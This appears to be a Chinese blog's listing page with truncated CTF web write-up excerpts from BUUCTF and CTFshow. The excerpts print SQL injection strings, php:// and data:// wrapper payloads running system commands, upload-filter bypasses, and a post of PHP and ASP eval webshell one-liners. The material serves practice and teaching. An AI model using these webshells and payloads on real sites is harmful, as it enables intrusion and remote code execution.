自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(55)
  • 收藏
  • 关注

原创 BUUCTF WEB [安洵杯 2019]easy_web

BUUCTF WEB [安洵杯 2019]easy_web题目链接BUUCTF在线评测题目源码i-SOON_CTF_2019/Web/easy_web at master · D0g3-Lab/i-SOON_CTF_2019解题思路进入环境后F12查看网页源代码<html><head></head><body><img src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAKgAAA

2022-05-02 19:58:46 837

原创 BUUCTF WEB [BJDCTF2020]Mark loves cat

BUUCTF WEB [BJDCTF2020]Mark loves cat在源码中没有发现漏洞点,使用dirsearch扫描,发现.gti泄露使用scrabble./scrabble http://70f9aaf8-036c-44f0-b1f1-df263f120cfa.node4.buuoj.cn:81/得到flag.php和index.php文件flag.php<?php$flag = file_get_contents('/flag');index.php&

2022-04-28 15:31:53 699

原创 BUUCTF WEB [BSidesCF 2020]Had a bad day

BUUCTF WEB [BSidesCF 2020]Had a bad dayindex.php?category=woofers'报错Warning: include(woofers'.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37Warning: include(): Failed opening 'woofers'.php' for inclusi

2022-04-28 10:15:41 646

原创 BUUCTF WEB [GWCTF 2019]我有一个数据库

BUUCTF WEB [GWCTF 2019]我有一个数据库刷新后查看响应包<!DOCTYPE html><html><head> <title>空的数据库</title></head><body> <h1>我有一个数据库,但里面什么也没有~</h1> <h1>不信你找</h1></body></html>没有什么其他

2022-04-27 00:20:33 398

原创 BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb

BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb进入环境,发现调用了date()函数,抓包后发现POST传参存在名为func,值为date的变量尝试修改func变量func=echo&p=Y-m-d+h%3Ai%3As+a回显Warning : call_user_func() expects parameter 1 to be a valid callback, function 'echo' not found or invalid function nam

2022-04-27 00:19:30 372

原创 BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此

BUUCTF WEB [BJDCTF2020]ZJCTF,不过如此进入环境后得到源码<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,

2022-04-22 17:57:00 1770

原创 BUUCTF WEB [GXYCTF2019]禁止套娃

BUUCTF WEB [GXYCTF2019]禁止套娃没有任何提示,使用dirsearch扫描# Dirsearch started Fri Apr 22 02:23:09 2022 as: ./dirsearch.py -u http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/ --delay=0.5 -t 3301 185B http://ffd94bba-98ea-4150-9103-09306827d709

2022-04-22 16:26:35 1518

原创 BUUCTF WEB [BJDCTF2020]The mystery of ip

BUUCTF WEB [BJDCTF2020]The mystery of ip在hint.php中找到一句注释<!-- Do you know why i know your ip? -->在flag.php中看到自己的ip,联想到X-Forwarded-For。使用Hackbar添加一个HTTP头X-Forwarded-For: 127.0.0.1回显为Your IP is : 127.0.0.1 说明我们获得了可控变量尝试命令注入失败,到这里就没什么思路

2022-04-22 14:18:03 3607

原创 BUUCTF WEB [BUUCTF 2018]Online Tool

BUUCTF WEB [BUUCTF 2018]Online Tool进入环境,得到一段代码<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])) { highlight_file(__FILE__);} else { $host = $_

2022-04-22 13:43:12 1517

原创 BUUCTF WEB [RoarCTF 2019]Easy Java

BUUCTF WEB [RoarCTF 2019]Easy Java进入环境后尝试万能密码登录、SQL注入,无效果点击help跳转,url为/Download?filename=help.docx回显为java.io.FileNotFoundException:{help.docx}使用伪协议下载help.docx文件失败,尝试使用POST下载下载成功后打开Are you sure the flag is here? ? ?发现没有任何提示尝试下载其他文件,题

2022-04-21 18:16:12 285

原创 BUUCTF WEB [GXYCTF2019]BabyUpload

BUUCTF WEB [GXYCTF2019]BabyUpload查看题目源码<?phpsession_start();echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Upload</title><form action=\"\" method=\"post\" enctype=\"multipart/form-dat

2022-04-20 16:18:14 450

原创 BUUCTF WEB [网鼎杯 2018]Fakebook

BUUCTF WEB [网鼎杯 2018]Fakebook进入环境,尝试各种功能,没能发现漏洞点,使用dirsearch扫描200 0B http://0fa8f160-8480-4f08-8eeb-df4cacc76aaa.node4.buuoj.cn:81/db.php200 0B http://0fa8f160-8480-4f08-8eeb-df4cacc76aaa.node4.buuoj.cn:81/error.php200 0B http://0f

2022-04-20 15:50:19 501 2

原创 CTFshow WEB web2

CTFshow WEB web2直接登录发现URL无变化,网页使用POST传递参数,使用Burp抓包POST / HTTP/1.1Host: d19be25d-ff35-4fa2-b9c2-957c36215fe4.challenge.ctf.showContent-Length: 21Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://d19be25d-ff35-4fa2-b9c2-957c36215fe

2022-04-19 12:03:47 788

原创 CTFshow WEB web3

CTFshow WEB web3进入环境,题目提示存在文件包含漏洞<?php include($_GET['url']);?>使用PHP伪协议?url=data://text/plain,<?php% system('ls');?>ctf_go_go_go index.php?url=php://filter/convert.base64-encode/resource=ctf_go_go_goY3Rmc2hvd3swNjNmNWZkYS0wZmU3L

2022-04-19 12:03:17 397

原创 CTFshow WEB web签到题

CTFshow WEB web签到题进入环境后F12查看源代码where is flag?<!-- Y3Rmc2hvd3tiM2ZkZDFlMS03N2E5LTQ5MmMtOWI2Ny1jM2FjMzliNmVhY2R9-->怀疑注释是base64编码,尝试解码,得到flagctfshow{b3fdd1e1-77a9-492c-9b67-c3ac39b6eacd}...

2022-04-19 12:02:45 977

原创 CTFshow WEB 给她

CTFshow WEB 萌新赛 给她题目名称类似git,猜测有信息泄露,使用scrabble,得到hint.php<?php$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));?>可以看出本题使用addslashes函数进行过滤,这里需要利用spr

2022-04-19 12:01:50 2108

原创 [CISCN2019 华北赛区 Day2 Web1]Hack World

BUUCTF WEB [CISCN2019 华北赛区 Day2 Web1]Hack World提交1成功,提交字母a报错,猜测查询语句查询的是整数,外部无包裹尝试后发现空格被过滤,但select未被过滤,直接查询id=;select(flag)from(flag);回显bool(false)题目提示flag是uuid,尝试使用布尔盲注来猜测字符串的长度与每一位的字母uuid, Universally Unique Identifier,是一个长度为32位的随机字符串

2022-04-18 22:35:40 294

原创 BUUCTF WEB [GYCTF2020]Blacklist

BUUCTF WEB [GYCTF2020]Blacklist提交1',报错error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1发现注入点尝试union注入/?inject=1' union select 1,2

2022-04-18 20:29:32 256

原创 BUUCTF WEB [GXYCTF2019]BabySQli

BUUCTF WEB [GXYCTF2019]BabySQli手工注入这里需要利用sqli的一个特性:在联合查询并不存在的数据时,联合查询会构造一个虚拟的数据假设联合查询前表结构如下idnamepassword1tom123456此时执行联合查询select * from 'users' where name='admin' union select 2,'admin','123';表结构将会变成idnamepassword1

2022-04-18 17:37:09 769

原创 BUUCTF WEB [网鼎杯 2020 青龙组]AreUSerialz

BUUCTF WEB [网鼎杯 2020 青龙组]AreUSerialz访问环境,得到源码<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $

2022-04-18 10:46:29 151

原创 BUUCTF WEB [MRCTF2020]Ez_bypass

BUUCTF WEB [MRCTF2020]Ez_bypass进入环境,提示I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&a

2022-04-18 10:19:14 435

原创 BUUCTF WEB [MRCTF2020]你传你*呢

BUUCTF WEB [MRCTF2020]你传你🐎呢解法有些类似[SUCTF 2019]CheckIn尝试上传各种php文件后缀均被过滤,尝试上传.htaccess文件将png文件当做php文件执行AddType application/x-httpd-php .png上传后抓包,将Content-Type修改为image/pngPOST /upload.php HTTP/1.1Host: e8fa21f8-9f43-498c-85ba-2444487773a4.node4.buu

2022-04-18 10:05:54 325

原创 BUUCTF WEB [SUCTF 2019]CheckIn

BUUCTF WEB [SUCTF 2019]CheckIn.user.ini文件PHP 支持基于每个目录的 INI 文件配置。除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。与php.ini不同,.user.ini是一个能被动态加载的ini文件,它实际上是一个可以由用户自定义

2022-04-17 22:08:12 309

原创 BUUCTF WEB [极客大挑战 2019]HardSQL

BUUCTF WEB [极客大挑战 2019]HardSQL万能密码、union联合注入等关键词and、union等均被过滤,尝试报错注入爆破库名1'or(extractvalue(1,concat(1,database())))#XPATH syntax error: 'geek'爆破表名1'or(extractvalue(1,concat(1,(select(table_name)from(information_schema.tables)where(table_schema

2022-04-17 21:17:49 580

原创 BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei

BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei源码index.php<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".fil

2022-04-17 20:38:09 210

原创 BUUCTF WEB [BJDCTF2020]Easy MD5

BUUCTF WEB [BJDCTF2020]Easy MD5源代码leveldo.php<?phpheader('hint:select * from \'admin\' where password='.'md5($pass,true)');?><!DOCTYPE html><html lang="zh-CN"><head> <meta charset="utf-8"> <meta http-equiv=

2022-04-17 17:49:58 197

原创 BUUCTF WEB [HCTF 2018]admin

BUUCTF WEB [HCTF 2018]admin解法1弱口令登录admin123得到flagflag{195df147-fa34-4359-b475-94f71265d085}解法2F12查看网页源代码,在change页面发现一段注释<!-- https://github.com/woadsl1234/hctf_flask/ -->下载源代码分析,改网站由flask模板搭建,尝试SSTI模板注入。查看路由信息routes.py@app.route('

2022-04-17 17:26:37 873

原创 BUUCTF WEB [极客大挑战 2019]BuyFlag

BUUCTF WEB [极客大挑战 2019]BuyFlag进入环境后在MENU中发现PAYFLAG功能,点击进入,提示FLAGFLAG NEED YOUR 100000000 MONEYATTENTIONIf you want to buy the FLAG:You must be a student from CUIT!!!You must be answer the correct password!!!Only Cuit's students can buy the FLA

2022-04-17 15:59:07 603

原创 preg_match

preg_match^为匹配字符串的开始位置$为匹配字符串的结束位置普通字符[ABC]匹配[...]中的所有字符[aeiou] 匹配字符串中的所有a e i o u字母[^ABC]匹配除了[...]中字符的所有字符[^aeiou] 匹配除了a e i o u之外的所有字母[A-Z]表示一个区间,匹配所有大写字母,[a-z]表示所有小写字母.匹配除换行符(\n、\r)之外的所有单个字符,相当于[^\n\r][\s\S]匹配所有。\s是匹配所有空白符,包括换行,\S

2022-04-17 15:28:55 769

原创 sqlmap使用参数

sqlmap使用参数Options:-h, --help 显示基本帮助信息并退出-hh 显示高级帮助信息并退出--version 显示程序的版本号并退出-v VERBOSE 详细级别:0-6(默认为1)Target:At least one of these options has to be provided to define thetarget(s)-u URL, --ur

2022-04-17 15:28:34 589

原创 BUUCTF WEB [护网杯 2018]easy_tornado

BUUCTF WEB [护网杯 2018]easy_tornado进入环境,发现三个文件/flag.txtflag in /fllllllllllllag/welcome.txtrender/hints.txtmd5(cookie_secret+md5(filename))根据题目提示可知,题目环境使用python tornado模板渲染搭建,flag文件名为fllllllllllllag。观察URL可知,访问文件需要提交文件名filename和利用cooki

2022-04-17 15:27:44 671

原创 BUUCTF WEB [ACTF2020 新生赛]BackupFile

BUUCTF WEB [ACTF2020 新生赛]BackupFile使用dirsearch扫描后台文件,发现 index.php.bak下载后直接打开<?phpinclude_once "flag.php";if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) { exit("Just num!"); } $key = intval($key);

2022-04-17 15:27:11 400

原创 一句话木马

一句话木马asp<%execute(request("value"))%>php<?php @eval($_POST[value]);?> <?php assert(@$_POST['a']); ?> <?php $fun = create_function('',$_POST['a']);$fun();?> <?php @call_user_func(assert,$_POST['a']);?>

2022-04-16 20:34:49 359

原创 文件包含漏洞

文件包含漏洞相关函数include()如果在包含文件的过程中出错,只会提出警告,会继续执行后续语句。require()如果在包含文件的过程中出错,比如文件不存在等,直接退出,不执行后续语句。include_once(),与include()相似,但如果一个文件已经被包含过了,就不会再包含它。require_once(),与'require()`相似,但如果一个文件已经被包含过了,就不会再包含它。应用场景具有相关的文件包含函数文件包含函数中存在动态变量include $fil

2022-04-16 20:34:26 250

原创 BUUCTF WEB [极客大挑战 2019]PHP

BUUCTF WEB [极客大挑战 2019]PHP题目提示网站存在备份,使用御剑扫描目录,发现备份文件http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip下载后解压,得到index.php、class.php、flag.php等文件。index.php(部分代码)<?phpinclude 'class.php';$select = $_GET['select'];$res=unser

2022-04-16 20:33:29 991

原创 BUUCTF WEB [RoarCTF 2019]Easy Calc

BUUCTF WEB [RoarCTF 2019]Easy CalcF12查看页面源代码<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>简单的计算器</title> <meta name="viewport" content="width=device

2022-04-16 20:32:47 371

原创 BUUCTF WEB [极客大挑战 2019]BabySQL

BUUCTF WEB [极客大挑战 2019]BabySQL进入环境后尝试万能密码登录失败,尝试常规sql注入check.php?username=1&password=2' union select 1,2,3;#回显You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use n

2022-04-16 20:31:55 158

原创 BUUCTF WEB [ACTF2020 新生赛]Upload

BUUCTF WEB [ACTF2020 新生赛]Upload生成一句话木马shell.png,内容为<?php @eval($_POST['shell']);?>上传后抓包,将文件名改为shell.phtmlPOST / HTTP/1.1Host: d75f0dc8-3e8d-4e83-8af8-8972c71f8057.node4.buuoj.cn:81Content-Length: 315Cache-Control: max-age=0Upgrade-Insec

2022-04-16 20:31:25 316

原创 BUUCTF WEB [极客大挑战 2019]Upload

BUUCTF WEB [极客大挑战 2019]Upload尝试提交一句话木马shell.php<?php @eval($_POST['shell']);?>回显为NOT!php!说明需要修改文件后缀修改文件后缀为.phtml后尝试提交,回显为NO! HACKER! your file included '<?'说明不能包含<?,尝试绕过过滤将文件内容修改为<script language="php">eval($_POST['she

2022-04-16 20:30:58 497

原创 BUUCTF WEB[极客大挑战 2019]Http

BUUCTF WEB[极客大挑战 2019]Http打开环境后F12查看源代码,发现一个跳转链接<a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a>尝试访问Secret.php,提示It doesn't come from 'https://Sycsecret.buuoj.cn'抓包,修改http请求头原请求包GET /Secre

2022-04-16 20:30:09 262

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除